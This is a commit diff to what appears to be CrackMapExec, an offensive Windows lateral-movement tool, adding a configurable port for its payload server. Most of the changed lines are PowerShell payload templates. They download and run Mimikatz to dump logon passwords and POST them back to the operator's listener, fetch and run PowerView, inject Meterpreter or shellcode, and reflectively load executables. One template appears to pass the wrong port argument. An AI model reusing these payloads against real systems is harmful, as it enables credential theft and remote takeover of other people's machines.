Added option to set the HTTP/HTTPS server port (resolves #33)
parent
0d1e580edd
commit
f0fe1a25a7
|
@ -32,9 +32,9 @@ class PowerShell:
|
|||
def mimikatz(self, command='privilege::debug sekurlsa::logonpasswords exit'):
|
||||
|
||||
command = """
|
||||
IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}/Invoke-Mimikatz.ps1');
|
||||
IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}:{port}/Invoke-Mimikatz.ps1');
|
||||
$creds = Invoke-{func_name} -Command '{katz_command}';
|
||||
$request = [System.Net.WebRequest]::Create('{protocol}://{addr}/');
|
||||
$request = [System.Net.WebRequest]::Create('{protocol}://{addr}:{port}/');
|
||||
$request.Method = 'POST';
|
||||
$request.ContentType = 'application/x-www-form-urlencoded';
|
||||
$bytes = [System.Text.Encoding]::ASCII.GetBytes($creds);
|
||||
|
@ -42,8 +42,9 @@ class PowerShell:
|
|||
$requestStream = $request.GetRequestStream();
|
||||
$requestStream.Write( $bytes, 0, $bytes.Length );
|
||||
$requestStream.Close();
|
||||
$request.GetResponse();""".format(protocol=self.protocol,
|
||||
func_name=self.func_name,
|
||||
$request.GetResponse();""".format(protocol=self.protocol,
|
||||
port=settings.args.server_port,
|
||||
func_name=self.func_name,
|
||||
addr=self.localip,
|
||||
katz_command=command)
|
||||
|
||||
|
@ -52,9 +53,9 @@ class PowerShell:
|
|||
def powerview(self, command):
|
||||
|
||||
command = """
|
||||
IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}/powerview.ps1');
|
||||
IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}:{port}/powerview.ps1');
|
||||
$output = {view_command} | Out-String;
|
||||
$request = [System.Net.WebRequest]::Create('{protocol}://{addr}/');
|
||||
$request = [System.Net.WebRequest]::Create('{protocol}://{addr}:{port}/');
|
||||
$request.Method = 'POST';
|
||||
$request.ContentType = 'application/x-www-form-urlencoded';
|
||||
$bytes = [System.Text.Encoding]::ASCII.GetBytes($output);
|
||||
|
@ -62,7 +63,8 @@ class PowerShell:
|
|||
$requestStream = $request.GetRequestStream();
|
||||
$requestStream.Write( $bytes, 0, $bytes.Length );
|
||||
$requestStream.Close();
|
||||
$request.GetResponse();""".format(protocol=self.protocol,
|
||||
$request.GetResponse();""".format(protocol=self.protocol,
|
||||
port=settings.args.port,
|
||||
addr=self.localip,
|
||||
view_command=command)
|
||||
|
||||
|
@ -70,12 +72,13 @@ class PowerShell:
|
|||
|
||||
def inject_meterpreter(self):
|
||||
command = """
|
||||
IEX (New-Object Net.WebClient).DownloadString('{0}://{1}/Invoke-Shellcode.ps1');
|
||||
Invoke-{2} -Force -Payload windows/meterpreter/{3} -Lhost {4} -Lport {5}""".format(self.protocol,
|
||||
IEX (New-Object Net.WebClient).DownloadString('{0}://{1}:{2}/Invoke-Shellcode.ps1');
|
||||
Invoke-{3} -Force -Payload windows/meterpreter/{4} -Lhost {5} -Lport {6}""".format(self.protocol,
|
||||
settings.args.server_port,
|
||||
self.localip,
|
||||
self.func_name,
|
||||
settings.args.inject[4:],
|
||||
settings.args.met_options[0],
|
||||
settings.args.inject[4:],
|
||||
settings.args.met_options[0],
|
||||
settings.args.met_options[1])
|
||||
if settings.args.procid:
|
||||
command += " -ProcessID {}".format(settings.args.procid)
|
||||
|
@ -86,10 +89,11 @@ class PowerShell:
|
|||
|
||||
def inject_shellcode(self):
|
||||
command = """
|
||||
IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}/Invoke-Shellcode.ps1');
|
||||
IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}:{port}/Invoke-Shellcode.ps1');
|
||||
$WebClient = New-Object System.Net.WebClient;
|
||||
[Byte[]]$bytes = $WebClient.DownloadData('{protocol}://{addr}/{shellcode}');
|
||||
[Byte[]]$bytes = $WebClient.DownloadData('{protocol}://{addr}:{port}/{shellcode}');
|
||||
Invoke-{func_name} -Force -Shellcode $bytes""".format(protocol=self.protocol,
|
||||
port=settings.args.server_port,
|
||||
func_name=self.func_name,
|
||||
addr=self.localip,
|
||||
shellcode=settings.args.path.split('/')[-1])
|
||||
|
@ -103,11 +107,12 @@ class PowerShell:
|
|||
|
||||
def inject_exe_dll(self):
|
||||
command = """
|
||||
IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}/Invoke-ReflectivePEInjection.ps1');
|
||||
Invoke-{func_name} -PEUrl {protocol}://{addr}/{pefile}""".format(protocol=self.protocol,
|
||||
func_name=self.func_name,
|
||||
addr=self.localip,
|
||||
pefile=settings.args.path.split('/')[-1])
|
||||
IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}:{port}/Invoke-ReflectivePEInjection.ps1');
|
||||
Invoke-{func_name} -PEUrl {protocol}://{addr}:{port}/{pefile}""".format(protocol=self.protocol,
|
||||
port=settings.args.server_port,
|
||||
func_name=self.func_name,
|
||||
addr=self.localip,
|
||||
pefile=settings.args.path.split('/')[-1])
|
||||
|
||||
if settings.args.procid:
|
||||
command += " -ProcID {}"
|
||||
|
|
|
@ -89,14 +89,14 @@ class MimikatzServer(BaseHTTPRequestHandler):
|
|||
for line in buf:
|
||||
print_att(line.strip())
|
||||
|
||||
def http_server():
|
||||
http_server = BaseHTTPServer.HTTPServer(('0.0.0.0', 80), MimikatzServer)
|
||||
def http_server(port):
|
||||
http_server = BaseHTTPServer.HTTPServer(('0.0.0.0', port), MimikatzServer)
|
||||
t = Thread(name='http_server', target=http_server.serve_forever)
|
||||
t.setDaemon(True)
|
||||
t.start()
|
||||
|
||||
def https_server():
|
||||
https_server = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), MimikatzServer)
|
||||
def https_server(port):
|
||||
https_server = BaseHTTPServer.HTTPServer(('0.0.0.0', port), MimikatzServer)
|
||||
https_server.socket = ssl.wrap_socket(https_server.socket, certfile='certs/crackmapexec.crt', keyfile='certs/crackmapexec.key', server_side=True)
|
||||
t = Thread(name='https_server', target=https_server.serve_forever)
|
||||
t.setDaemon(True)
|
||||
|
|
|
@ -72,7 +72,7 @@ parser.add_argument("-s", metavar="SHARE", dest='share', default="C$", help="Spe
|
|||
parser.add_argument('--kerb', action="store_true", dest='kerb', help='Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters')
|
||||
parser.add_argument("--port", dest='port', type=int, choices={139, 445}, default=445, help="SMB port (default: 445)")
|
||||
parser.add_argument("--server", choices={'http', 'https'}, default='http', help='Use the selected server (defaults to http)')
|
||||
#parser.add_argument("--server-port", type=int, help='Start the server on the specified port')
|
||||
parser.add_argument("--server-port", type=int, help='Start the server on the specified port')
|
||||
|
||||
#How much fail can we limit? can we fail at failing to limit? da da da dum
|
||||
parser.add_argument("--fail-limit", metavar='LIMIT', type=int, default=None, help='The max number of failed login attempts allowed per host (default: None)')
|
||||
|
@ -150,6 +150,18 @@ args.target = args.target[0]
|
|||
patterns = []
|
||||
targets = []
|
||||
|
||||
if args.server == 'http':
|
||||
if args.server_port:
|
||||
args.http_port = args.server_port
|
||||
else:
|
||||
args.server_port = 80
|
||||
|
||||
if args.server == 'https':
|
||||
if args.server_port:
|
||||
args.https_port = args.server_port
|
||||
else:
|
||||
args.server_port = 443
|
||||
|
||||
init_args(args)
|
||||
|
||||
if args.verbose:
|
||||
|
@ -245,10 +257,10 @@ else:
|
|||
|
||||
if args.mimikatz or args.powerview or args.mimikatz_cmd or args.inject or args.ntds == 'ninja':
|
||||
if args.server == 'http':
|
||||
http_server()
|
||||
http_server(args.server_port)
|
||||
|
||||
elif args.server == 'https':
|
||||
https_server()
|
||||
https_server(args.server_port)
|
||||
|
||||
def concurrency(targets):
|
||||
'''
|
||||
|
|
Loading…
Reference in New Issue